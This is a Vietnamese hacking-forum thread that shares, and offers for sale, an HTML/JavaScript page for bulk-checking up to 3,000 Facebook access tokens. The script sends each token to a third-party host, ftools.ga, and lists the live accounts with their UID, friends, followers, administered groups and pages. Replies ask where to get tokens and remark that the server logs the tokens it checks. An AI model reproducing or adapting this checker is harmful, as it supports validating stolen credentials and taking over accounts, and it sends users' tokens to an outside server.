Hi, Phòng khách!
Trang chủ
Đăng nhập
Công Cụ Tìm Kiếm

Lần hoạt động

| |
Tìm kiếm | Tập tin chủ đề (1)

  Code check token có sub, page, group

Bài viết được duyệt bởi Puaru
Đăng ngày :31.05.2018 / 15:13[TOP]
QQ
QQ
Active Member
Check token, check sub, check group admin có nhiều mem nhất, check page admin có nhiều like nhất
Mã Code Vina4u
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yo/r/iRmz9lCMBD2.ico">

<title>ACCESS TOKEN CHECKER</title>

<!-- Bootstrap core CSS -->
<link href="https://getbootstrap.com/docs/4.1/dist/css/bootstrap.min.css" rel="stylesheet">

<!-- Custom styles for this template -->
<link href="https://cdn.datatables.net/1.10.16/css/jquery.dataTables.min.css" rel="stylesheet">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://cdn.datatables.net/1.10.16/js/jquery.dataTables.min.js"></script>
<script>
var liveaccount = 0,
dieaccount = 0;
stt = 0;
$(document).ready(function() {
$("#result_div").hide();
$("#submit").click(function() {
var listToken = $("#listToken").val().trim();
if (listToken == "") {
alert("Please input list token!");
} else {
var arrAccount = listToken.split(/\n/);
arrAl = arrAccount.length;
if(arrAl < 3001){
$(this).unbind("click");
jQuery.each(arrAccount, function(i, token) {
$.getJSON('https://ftools.ga/access_token/check.php?access_token=' + token,
function(data) {
if(data.status==1){
stt++;
liveaccount++;
$('.live').text(liveaccount);
$('#liveaccount').append(token + '\n');
$("#example").DataTable().row.add([
stt, data.uid, '<input type="text" value="'+token+'">', data.location, data.friend, data.sub, data.group, data.page, data.very
]).draw();
}else{
dieaccount++;
$('.die').text(dieaccount);
$('#dieaccount').append(token + '\n');
}
$('.total').text(liveaccount+dieaccount);
})

});
$("#result_div").fadeIn();
}else{
alert("Mỗi lần check tối đa 3k token!");
}
}
})

})
</script>
</head>

<body class="bg-light">

<div class="container">
<div class="py-5 text-center">
<h2>ACCESS TOKEN CHECKER</h2>
</div>

<div class="row">
<div class="col-md-4 order-md-2 mb-4">
<h4 class="d-flex justify-content-between align-items-center mb-3">
<span class="text-muted">RESULT</span>
<span class="badge badge-info badge-pill total">0</span>
</h4>
<ul class="list-group mb-3">
<li class="list-group-item d-flex justify-content-between">
<span>LIVE</span>
<strong><span class="badge badge-success badge-pill live">0</span></strong>
</li>
<li class="list-group-item d-flex justify-content-between">
<span>DIE</span>
<strong><span class="badge badge-danger badge-pill die">0</span></strong>
</li>
</ul>
<hr class="mb-4">
<button class="btn btn-info btn-lg btn-block" type="button" id="submit">CHECK</button>
</div>
<div class="col-md-8 order-md-1">
<h4 class="mb-3">ACCESS TOKEN</h4>
<form class="needs-validation" novalidate>
<div class="row">
<div class="col-md-12 mb-3">
<textarea class="form-control" id="listToken" style="height:200px"></textarea>
</div>
</div>
</form>
</div>
</div>
<div class="row" id="result_div">
<div class="col-md-6 order-md-1">
<h4 class="mb-3">LIVE</h4>
<form class="needs-validation" novalidate>
<div class="row">
<div class="col-md-12 mb-3">
<textarea class="form-control" id="liveaccount" style="height:200px"></textarea>
</div>
</div>
</form>
</div>
<div class="col-md-6 order-md-1">
<h4 class="mb-3">DIE</h4>
<form class="needs-validation" novalidate>
<div class="row">
<div class="col-md-12 mb-3">
<textarea class="form-control" id="dieaccount" style="height:200px"></textarea>
</div>
</div>
</form>
</div>
<div class="col-md-12 order-md-1">
<table id="example" style="width:100%">
<thead>
<tr>
<th>#</th>
<th>UID</th>
<th>TOKEN</th>
<th>LOCATION</th>
<th>FRIEND</th>
<th>SUB</th>
<th>GROUP</th>
<th>PAGE</th>
<th>VERY</th>
</tr>
</thead>
<tbody id="token_info">
</tbody>
</table>
</div>
</div>
<footer class="my-5 pt-5 text-muted text-center text-small">
<p class="mb-1">&copy; 2017-2018 Company Name</p>
<ul class="list-inline">
<li class="list-inline-item"><a href="#">Privacy</a></li>
<li class="list-inline-item"><a href="#">Terms</a></li>
<li class="list-inline-item"><a href="#">Support</a></li>
</ul>
</footer>
</div>

</body>
</html>Tập tin đính kèm:
Tải Về [Vina4UVN]100009641check.zip (1.47 KB.)
Giá Tệp Tin: 10,000 SCoin
Hướng Dẫn Nạp SCoin
Downloads: 2 Lần

Đăng ngày :31.05.2018 / 15:47 #1
CS12
♛Ánh20cm✔
Super Moderator
♥♥♥♥♥
[HayLike.Pro Dịch Vụ Vip Facebook]
show ra rồi còn đễ giá
Đăng ngày :31.05.2018 / 16:09 #2
junsino
junsino
Active Member
Trích dẫn: QQ (55 phút trước)
Check token, check sub, check group admin có nhiều mem nhất, check page admin có nhiều like nhất
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" con
xin it token :<
Đăng ngày :31.05.2018 / 16:31 #3
trunghi
trunghi
Active Member
[Bán Host 20k . Ibx]
hóng đoạn code này :
Vui lòng đăng nhập để thấy Links!
Đăng ngày :31.05.2018 / 16:35 #4
kenthudoan
kenthudoan
Active Member
[kaneki ken]
thanks
Đăng ngày :31.05.2018 / 16:46 #5
QQ
QQ
Active Member
Trích dẫn: trunghi (15 phút trước)
hóng đoạn code này :
Vui lòng đăng nhập để thấy Links!
Có đính kèm rồi đấy, ko thì xài trung gian của t cũng được
Đăng ngày :31.05.2018 / 19:37 #6
superban
superban
Active Member
vấn đề lấy token ở đâu để check )
Đăng ngày :31.05.2018 / 22:17 #7
linode
linode
Active Member
klq nhưng check sub để làm gì nhỉ. chả biết gì về fb cả
Đăng ngày :07.07.2018 / 09:55 #8
nhatdzhacking
iconnhatdzhacking
Active Member
check *** được
Đăng ngày :07.07.2018 / 12:22 #9
thodaity
thodaity
Active Member
[Coder & Design]
^^ lưu log check về sever ^^
Bình luận bài viết
Đăng Nhập để Bình luận và sử dụng đầy đủ tính năng Diễn Đàn
  Tổng số: 18 Bình luận

Chia sẻ bài viết
Đám Mây Từ Khóa
Bài Viết Cùng chuyên mục
Lọc theo tác giả
Xem chủ để ngoại tuyến (Offline)

Trong diễn đàn

Sắp xếp theo thứ tự từ trên xuống
BigTruyen.info - Kho Truyện Tranh Online Khổng lồ
Trang chủ